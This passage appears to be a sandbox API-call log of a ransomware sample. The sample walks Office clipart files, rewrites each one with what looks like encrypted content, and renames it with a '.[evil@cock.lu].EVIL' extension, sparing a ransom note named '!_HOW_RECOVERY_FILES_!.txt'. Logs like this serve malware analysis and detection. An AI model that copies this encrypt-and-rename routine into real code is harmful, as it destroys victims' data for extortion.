??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.825] _errno () returned 0x84b1160840 [0120.825] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.825] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2180, lpOverlapped=0x0) returned 1 [0120.825] CloseHandle (hObject=0x1a8) returned 1 [0120.826] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.826] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.826] __uncaught_exception () returned 0x84b1160800 [0120.826] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.826] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00369_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00369_.wmf.[evil@cock.lu].evil")) returned 1 [0120.827] ??_V@YAXPEAX@Z () returned 0x1 [0120.829] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00369_.WMF", dwFileAttributes=0x200) returned 0 [0120.829] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.829] wcsstr (_Str="FD00382_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.830] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 69 [0120.830] wcscmp (_String1="FD00382_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.830] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00382_.WMF") returned 0x0 [0120.830] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 0x45 [0120.830] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00382_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.832] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x20e8, lpOverlapped=0x0) returned 1 [0120.857] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.857] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.857] _errno () returned 0x84b1160840 [0120.857] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.857] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x2100, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2100, lpOverlapped=0x0) returned 1 [0120.858] CloseHandle (hObject=0x1a8) returned 1 [0120.858] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.858] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.858] __uncaught_exception () returned 0x84b1160800 [0120.858] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.858] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00382_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00382_.wmf.[evil@cock.lu].evil")) returned 1 [0120.859] ??_V@YAXPEAX@Z () returned 0x1 [0120.861] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00382_.WMF", dwFileAttributes=0x200) returned 0 [0120.862] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.862] wcsstr (_Str="FD00397_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.862] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 69 [0120.862] wcscmp (_String1="FD00397_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.862] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00397_.WMF") returned 0x0 [0120.862] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 0x45 [0120.862] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00397_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.864] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2a40, lpOverlapped=0x0) returned 1 [0120.866] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.866] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.866] _errno () returned 0x84b1160840 [0120.866] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.866] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x2a60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2a60, lpOverlapped=0x0) returned 1 [0120.866] CloseHandle (hObject=0x1a8) returned 1 [0120.866] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.867] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.867] __uncaught_exception () returned 0x84b1160800 [0120.867] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.867] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00397_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00397_.wmf.[evil@cock.lu].evil")) returned 1 [0120.867] ??_V@YAXPEAX@Z () returned 0x1 [0120.870] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00397_.WMF", dwFileAttributes=0x200) returned 0 [0120.870] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.898] wcsstr (_Str="FD00403_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.898] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 69 [0120.898] wcscmp (_String1="FD00403_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.898] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00403_.WMF") returned 0x0 [0120.898] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 0x45 [0120.898] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00403_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.900] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1ec6, lpOverlapped=0x0) returned 1 [0120.904] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.904] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.904] _errno () returned 0x84b1160840 [0120.904] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.904] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x1ee0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1ee0, lpOverlapped=0x0) returned 1 [0120.904] CloseHandle (hObject=0x1a8) returned 1 [0120.904] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.904] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.904] __uncaught_exception () returned 0x84b1160800 [0120.904] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.905] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00403_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00403_.wmf.[evil@cock.lu].evil")) returned 1 [0120.905] ??_V@YAXPEAX@Z () returned 0x1 [0120.908] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF", dwFileAttributes=0x200) returned 0 [0120.908] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.908] wcsstr (_Str="FD00414_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.908] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 69 [0120.908] wcscmp (_String1="FD00414_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.908] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00414_.WMF") returned 0x0 [0120.908] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 0x45 [0120.908] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00414_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.911] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2afa, lpOverlapped=0x0) returned 1 [0120.914] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.914] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.914] _errno () returned 0x84b1160840 [0120.914] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.914] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x2b00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2b00, lpOverlapped=0x0) returned 1 [0120.914] CloseHandle (hObject=0x1a8) returned 1 [0120.914] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.914] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.914] __uncaught_exception () returned 0x84b1160800 [0120.914] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.914] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00414_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00414_.wmf.[evil@cock.lu].evil")) returned 1 [0120.915] ??_V@YAXPEAX@Z () returned 0x1 [0120.918] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF", dwFileAttributes=0x200) returned 0 [0120.918] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.918] wcsstr (_Str="FD00419_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.918] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 69 [0120.918] wcscmp (_String1="FD00419_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.918] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00419_.WMF") returned 0x0 [0120.918] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF") returned 0x45 [0120.918] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00419_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.920] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x400c, lpOverlapped=0x0) returned 1 [0120.936] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.936] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0120.936] _errno () returned 0x84b1160840 [0120.936] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.936] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x4020, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4020, lpOverlapped=0x0) returned 1 [0120.936] CloseHandle (hObject=0x1a8) returned 1 [0120.936] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0120.936] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0120.936] __uncaught_exception () returned 0x84b1160800 [0120.936] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0120.936] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00419_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00419_.wmf.[evil@cock.lu].evil")) returned 1 [0120.937] ??_V@YAXPEAX@Z () returned 0x1 [0120.940] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00419_.WMF", dwFileAttributes=0x200) returned 0 [0120.940] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0120.940] wcsstr (_Str="FD00428_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0120.940] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 69 [0120.940] wcscmp (_String1="FD00428_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0120.940] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00428_.WMF") returned 0x0 [0120.940] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF") returned 0x45 [0120.940] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00428_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0120.942] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x12bc, lpOverlapped=0x0) returned 1 [0121.025] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.025] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.025] _errno () returned 0x84b1160840 [0121.025] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.025] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x12c0, lpOverlapped=0x0) returned 1 [0121.025] CloseHandle (hObject=0x1a8) returned 1 [0121.026] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0121.026] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0121.026] __uncaught_exception () returned 0x84b1160800 [0121.026] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0121.026] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00428_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00428_.wmf.[evil@cock.lu].evil")) returned 1 [0121.027] ??_V@YAXPEAX@Z () returned 0x1 [0121.029] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00428_.WMF", dwFileAttributes=0x200) returned 0 [0121.029] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0121.030] wcsstr (_Str="FD00435_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0121.030] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 69 [0121.030] wcscmp (_String1="FD00435_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0121.030] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00435_.WMF") returned 0x0 [0121.030] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF") returned 0x45 [0121.030] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00435_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0121.032] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x83c, lpOverlapped=0x0) returned 1 [0121.050] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.050] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.050] _errno () returned 0x84b1160840 [0121.050] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.050] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x840, lpOverlapped=0x0) returned 1 [0121.050] CloseHandle (hObject=0x1a8) returned 1 [0121.050] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0121.050] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0121.050] __uncaught_exception () returned 0x84b1160800 [0121.050] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0121.051] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00435_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00435_.wmf.[evil@cock.lu].evil")) returned 1 [0121.051] ??_V@YAXPEAX@Z () returned 0x1 [0121.054] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00435_.WMF", dwFileAttributes=0x200) returned 0 [0121.054] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0121.054] wcsstr (_Str="FD00438_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0121.054] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 69 [0121.054] wcscmp (_String1="FD00438_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0121.054] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00438_.WMF") returned 0x0 [0121.054] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 0x45 [0121.054] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00438_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0121.056] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x13ea, lpOverlapped=0x0) returned 1 [0121.124] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.124] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.124] _errno () returned 0x84b1160840 [0121.124] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.124] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: 